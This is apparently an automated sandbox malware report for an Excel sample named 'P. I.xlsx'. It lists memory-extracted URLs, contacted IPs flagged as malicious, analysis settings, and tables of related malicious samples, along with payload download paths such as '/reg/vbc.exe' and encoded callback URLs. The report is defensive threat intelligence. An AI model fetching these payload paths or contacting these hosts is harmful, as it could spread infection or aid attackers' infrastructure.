                                            http://www3.fnac.com/favicon.icoexplorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                              high
                                              http://buscar.ya.com/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                high
                                                http://search.yahoo.com/favicon.icoexplorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  high
                                                  http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.2155629669.0000000004B50000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.sogou.com/favicon.icoexplorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    high
                                                    http://asp.usatoday.com/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      high
                                                      http://fr.search.yahoo.com/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        high
                                                        http://rover.ebay.comexplorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          high
                                                          http://in.search.yahoo.com/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            high
                                                            http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              high
                                                              http://search.ebay.in/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                high
                                                                http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://%s.comexplorer.exe, 00000006.00000000.2164967581.000000000A330000.00000008.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                low
                                                                http://msk.afisha.ru/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  high
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000004.00000002.2139033957.000000000239E000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://search.rediff.com/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      high
                                                                      http://www.windows.com/pctv.explorer.exe, 00000006.00000000.2152230582.0000000003C40000.00000002.00000001.sdmpfalse
                                                                        high
                                                                        http://www.ya.com/favicon.icoexplorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          high
                                                                          http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://it.search.dada.net/favicon.icoexplorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://search.naver.com/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            high
                                                                            http://www.google.ru/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              high
                                                                              http://search.hanafos.com/favicon.icoexplorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://coinmarketcap.com/api/vbc.exe, vbc.exe, 00000005.00000002.2188294879.0000000000B82000.00000020.00020000.sdmp, svchost.exe, 00000007.00000002.2350236075.00000000005FC000.00000004.00000020.sdmpfalse
                                                                                high
                                                                                http://www.abril.com.br/favicon.icoexplorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://search.daum.net/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  high
                                                                                  http://search.naver.com/favicon.icoexplorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    high
                                                                                    http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://www.clarin.com/favicon.icoexplorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      high
                                                                                      http://buscar.ozu.es/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://kr.search.yahoo.com/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        high
                                                                                        http://search.about.com/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          high
                                                                                          http://busca.igbusca.com.br/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            high
                                                                                            http://www.ask.com/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              high
                                                                                              http://www.priceminister.com/favicon.icoexplorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                high
                                                                                                http://www.cjmall.com/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://search.centrum.cz/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://suche.t-online.de/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://www.google.it/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://search.auction.co.kr/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://www.ceneo.pl/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://www.amazon.de/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.2161003996.000000000861C000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://sads.myspace.com/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://google.pchome.com.tw/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.rambler.ru/favicon.icoexplorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://uk.search.yahoo.com/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://espanol.search.yahoo.com/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.ozu.es/favicon.icoexplorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://search.sify.com/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://openimage.interpark.com/interpark.icoexplorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            http://search.ebay.com/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.gmarket.co.kr/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://search.nifty.com/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://searchresults.news.com.au/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://www.google.si/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://www.google.cz/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://www.soso.com/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://www.univision.com/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://search.ebay.it/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://www.asharqalawsat.com/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            http://busca.orange.es/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000006.00000000.2164967581.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://search.yahoo.co.jpexplorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://www.target.com/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://buscador.terra.es/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://search.orange.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://www.iask.com/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://www.tesco.com/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://cgi.search.biglobe.ne.jp/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://search.seznam.cz/favicon.icoexplorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://suche.freenet.de/favicon.icoexplorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://search.interpark.com/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            http://investor.msn.com/explorer.exe, 00000006.00000000.2152230582.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://search.espn.go.com/explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://www.myspace.com/favicon.icoexplorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://search.centrum.cz/favicon.icoexplorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://p.zhongsou.com/favicon.icoexplorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown

                                                                                                                                                                    Contacted IPs

                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                    Public

                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                    101.100.209.140
                                                                                                                                                                    unknownSingapore
                                                                                                                                                                    58621VODIEN-AS-AP-LOC2VodienInternetSolutionsPteLtdSGtrue
                                                                                                                                                                    104.130.255.68
                                                                                                                                                                    unknownUnited States
                                                                                                                                                                    33070RMH-14UStrue
                                                                                                                                                                    198.23.212.188
                                                                                                                                                                    unknownUnited States
                                                                                                                                                                    36352AS-COLOCROSSINGUStrue
                                                                                                                                                                    34.102.136.180
                                                                                                                                                                    unknownUnited States
                                                                                                                                                                    15169GOOGLEUStrue
                                                                                                                                                                    74.220.199.6
                                                                                                                                                                    unknownUnited States
                                                                                                                                                                    46606UNIFIEDLAYER-AS-1UStrue
                                                                                                                                                                    154.215.9.186
                                                                                                                                                                    unknownSeychelles
                                                                                                                                                                    62468VPSQUANUStrue
                                                                                                                                                                    198.101.172.217
                                                                                                                                                                    unknownUnited States
                                                                                                                                                                    19994RACKSPACEUStrue

                                                                                                                                                                    General Information

                                                                                                                                                                    Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                                    Analysis ID:323360
                                                                                                                                                                    Start date:26.11.2020
                                                                                                                                                                    Start time:21:21:10
                                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                                    Overall analysis duration:0h 9m 46s
                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                    Report type:light
                                                                                                                                                                    Sample file name:P. I.xlsx
                                                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                                    Number of analysed new started processes analysed:9
                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                    Number of injected processes analysed:1
                                                                                                                                                                    Technologies:
                                                                                                                                                                    • HCA enabled
                                                                                                                                                                    • EGA enabled
                                                                                                                                                                    • HDC enabled
                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                    Detection:MAL
                                                                                                                                                                    Classification:mal100.troj.spyw.expl.evad.winXLSX@9/6@7/7
                                                                                                                                                                    EGA Information:Failed
                                                                                                                                                                    HDC Information:
                                                                                                                                                                    • Successful, ratio: 37.5% (good quality ratio 35.4%)
                                                                                                                                                                    • Quality average: 73.7%
                                                                                                                                                                    • Quality standard deviation: 29.6%
                                                                                                                                                                    HCA Information:
                                                                                                                                                                    • Successful, ratio: 95%
                                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                    • Adjust boot time
                                                                                                                                                                    • Enable AMSI
                                                                                                                                                                    • Found application associated with file extension: .xlsx
                                                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                    • Attach to Office via COM
                                                                                                                                                                    • Scroll down
                                                                                                                                                                    • Close Viewer
                                                                                                                                                                    Warnings:
                                                                                                                                                                    Show All
                                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                                                                                                                                    • TCP Packets have been reduced to 100
                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                    • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                    • VT rate limit hit for: /opt/package/joesandbox/database/analysis/323360/sample/P. I.xlsx

                                                                                                                                                                    Simulations

                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                    21:22:00API Interceptor52x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                                                    21:22:02API Interceptor123x Sleep call for process: vbc.exe modified
                                                                                                                                                                    21:22:28API Interceptor230x Sleep call for process: svchost.exe modified
                                                                                                                                                                    21:23:07API Interceptor1x Sleep call for process: explorer.exe modified

                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                    IPs

                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                    104.130.255.687New PO's 3.exeGet hashmaliciousBrowse
                                                                                                                                                                    • www.ravennahub.net/no/?004=W4AmBrEus9upSXA3UFjZAed3kISJc8znyYaKtYnCAT8OZ2b1zRI+80PWf0jEyvjW0vJJ0P4WwUh0wzcz&w0=9rQlzVNptHwh
                                                                                                                                                                    59New PO's 3319971.exeGet hashmaliciousBrowse
                                                                                                                                                                    • www.ravennahub.net/no/?w21=W4AmBrEus9upSXA3UFjZAed3kISJc8znyYaKtYnCAT8OZ2b1zRI+80PWf0jEyvjW0vJJ0P4WwUh0wzcz&5j=7nsDG
                                                                                                                                                                    198.23.212.188EME_PO.39134.xlsxGet hashmaliciousBrowse
                                                                                                                                                                    • 198.23.212.188/reg/vbc.exe
                                                                                                                                                                    Order List.xlsxGet hashmaliciousBrowse
                                                                                                                                                                    • 198.23.212.188/reg/vbc.exe
                                                                                                                                                                    Order List.xlsxGet hashmaliciousBrowse
                                                                                                                                                                    • 198.23.212.188/reg/vbc.exe
                                                                                                                                                                    34.102.136.180Shipping INVOICE-BL Shipment..exeGet hashmaliciousBrowse
                                                                                                                                                                    • www.gettingthehelloutofca.com/mqgf/?1bz=KR2H7bR68gwXZ0UwRZoWOm+3/bRM+9g3CvwIMuaCj43AHNBZDZgp33E9vheCRffBPsp5&v2Jx9=0pY0Q8thwtJli0y0
                                                                                                                                                                    PO98765.exeGet hashmaliciousBrowse
                                                                                                                                                                    • www.westhighlandwaytours.com/sbmh/?4hLtM4=7c1Yf2hXTdqRFKk5H17xFHcZtn6ZaViryhouZ8x83IEcsjPhhroi25cpiHSX6hk8gWCa&n0DXRn=xPJxZNG0xPz
                                                                                                                                                                    Booking Confirmation.xlsxGet hashmaliciousBrowse
                                                                                                                                                                    • www.setyourhead.com/kgw/?YPxdA=qxnbG0TgnGHGw+QslghqCPaDw7mfFbPu6Z/l2x9tLypy5Il4TL/Oe56TI1g3tXVevJbT7w==&FN=-ZD4lhJxcp08lll
                                                                                                                                                                    PI202009255687.xlsxGet hashmaliciousBrowse
                                                                                                                                                                    • www.lygosfilms.info/ogg/?Xrx4lx8=o9DTWGgejQhFb0XDNKFr8x252gLWlqtFw+u/IiN1z9p9QWzZEqjsrtg5rynyb3VCEFeW0g==&eny8V=8p-t_j0xRnOLT2
                                                                                                                                                                    VOMAXTRADING.docGet hashmaliciousBrowse
                                                                                                                                                                    • www.mycapecrusade.com/bu43/?OBZPd=k6AhchXHBB&Yzrx=5Lfh6qcZO6QCpL41ah3mk8LUL3OJ/OZx9c26bzra2u0GgF5XtbJN8WKHQCrI7u2LEBkhnA==
                                                                                                                                                                    purchase order.exeGet hashmaliciousBrowse
                                                                                                                                                                    • www.rettexo.com/sbmh/?0PJtBJ=kHp9H1tPAFmVsD64lxBGFA2zeARzx9tS7bJBiT/v97zwTY8F+uE1Nk95aq19aJdA0x4qnOoYAg==&jDHXG=aFNTklSp
                                                                                                                                                                    inv.exeGet hashmaliciousBrowse
                                                                                                                                                                    • www.nextgenmemorabilia.com/hko6/?rL0=EcalOYSyHuIWNe0yBiyzQnDoyWnQ8AXmuso6y7H91Y9cmoRSZtclvU9o5GCKwGOmvOmDBOYeyw==&3f_X=Q2J8lT4hKB4
                                                                                                                                                                    anthon.exeGet hashmaliciousBrowse
                                                                                                                                                                    • www.stlmache.com/94sb/?D8c=zlihirZ0hdZXaD&8pdPSNhX=oHhCnRhAqLFON9zTJDssyW7Qcc6qw5o0Z4654po5P9rAmpqiU8ijSaSHb7UixrcmwTy4
                                                                                                                                                                    RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exeGet hashmaliciousBrowse
                                                                                                                                                                    • www.messianicentertainment.com/mkv/
                                                                                                                                                                    Scan 25112020 pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                    • www.youarecoveredamerica.com/cxs/?wR=30eviFukjpDMKdZAPLSN5kaysTzlcADcsOyOixR0/60FoTO0nFa3+4ZYvhmf8uIzSvTf&V4=inHXwbhx
                                                                                                                                                                    PO EME39134.xlsxGet hashmaliciousBrowse
                                                                                                                                                                    • www.pethgroup.com/mfg6/?NL08b=wzYKSVBwuJMkKFzZssaTzgW2Vk9zJFgyObnh9ous05GVmO8iDcl865kQdMMIGiQlXQz3Bg==&Ab=JpApTx
                                                                                                                                                                    PRODUCT INQUIRY BNQ1.xlsxGet hashmaliciousBrowse
                                                                                                                                                                    • www.d2cbox.com/coz3/?RFN4=Db4oM/0ZSLcS2WrsSk0EAPitYAH7G5kPXSBsu1Ti9XYpj/EUmwYzXG6I+6XEGkDvXHlCmg==&RB=NL00JzKhBv9HkNRp
                                                                                                                                                                    Document Required.xlsxGet hashmaliciousBrowse
                                                                                                                                                                    • www.vegbydesign.net/et2d/?LDHDp=V0L4Gg8XEG33noZ7KcimyECCbO7JKaiXnbIiZHmOm/4B4fbkqB2G6gSUl7eOq1VGLYG7cQ==&1bY8l=ktg8tf6PjX7
                                                                                                                                                                    Payment - Swift Copy.exeGet hashmaliciousBrowse
                                                                                                                                                                    • www.meetyourwish.com/mnc/?Mdkdxdax=WY4KUSY8ftRWBzX7AqE30jxuDiwNulyYTSspkj6O426HLT41/FrvTZzWmkvAdUuy3I6l&ZVj0=YN6tXn0HZ8X
                                                                                                                                                                    Shipment Document BLINV And Packing List Attached.exeGet hashmaliciousBrowse
                                                                                                                                                                    • www.kanmra.com/bg8v/?DXIXO=bN+sZwdqksHEVUXNrgv1qWKxxuRS+qOVBUFqNGSJvK31ERFsrbT8+Ywa/qntJ641tecm&Jt7=XPv4nH2h
                                                                                                                                                                    SR7UzD8vSg.exeGet hashmaliciousBrowse
                                                                                                                                                                    • www.seatoskyphotos.com/g65/?7nwhJ4l=TXJeSLolb01vansOrhIgOMhNYUnQdj/rfF4amJcBrUYE+yYYkSMe6xNPoYCNXAECPfCM&PpJ=2dGHUZtH1RcT9x
                                                                                                                                                                    fSBya4AvVj.exeGet hashmaliciousBrowse
                                                                                                                                                                    • www.crdtchef.com/coz3/?uVg8S=yVCTVPM0BpPlbRn&Cb=6KJmJcklo30WnY6vewxcXLig2KFmxMKN3/pat9BWRdDInxGr1qf1MmoT0+9/86rmVbJja+uPDg==
                                                                                                                                                                    7OKYiP6gHy.exeGet hashmaliciousBrowse
                                                                                                                                                                    • www.space-ghost.com/mz59/?DxlpdH=bx7WlvEZr3O5XBwInsT/p4C3h10gePk/QJkiFTbVYZMx/qNyufU701Fr8sAaS9DQf7SJ&k2Jxtb=fDHHbT_hY
                                                                                                                                                                    ptFIhqUe89.exeGet hashmaliciousBrowse
                                                                                                                                                                    • www.pethgroup.com/mfg6/?EZxHcv=idCXUjVPw&X2MdRr9H=wzYKSVB1uOMgKV/VusaTzgW2Vk9zJFgyOb/xhrytwZGUm/QkEM0ws9cSepgeCyUWcTuH
                                                                                                                                                                    G1K3UzwJBx.exeGet hashmaliciousBrowse
                                                                                                                                                                    • www.softdevteams.com/wsu/?JfBpEB4H=UDFlvLrb363Z/K3+q9OjWueixmKoOm8xQw3Yd3ofqrJMoI6bXqsuqW1H0uReyIz+CvJE&odqddr=RzuhPD

                                                                                                                                                                    Domains

                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                    reachlocal.cloudbackend.net7New PO's 3.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 104.130.255.68
                                                                                                                                                                    59New PO's 3319971.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 104.130.255.68

                                                                                                                                                                    ASN

                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                    VODIEN-AS-AP-LOC2VodienInternetSolutionsPteLtdSGQuotation BID for FLORADYE-897498-sn-479873.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 119.31.235.105
                                                                                                                                                                    Quotation BID for FLORADYE-7875657875sn789894.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 119.31.235.105
                                                                                                                                                                    https://jiji.sg/modules/33338888/kutxacc/d8d1c4c534e3fbc/login.php?error=1&#_430cec0a06f011877Get hashmaliciousBrowse
                                                                                                                                                                    • 101.100.201.17
                                                                                                                                                                    ORDER...08312020.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 111.235.136.11
                                                                                                                                                                    aAz6J4ZdUpY0h3s.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 111.235.136.11
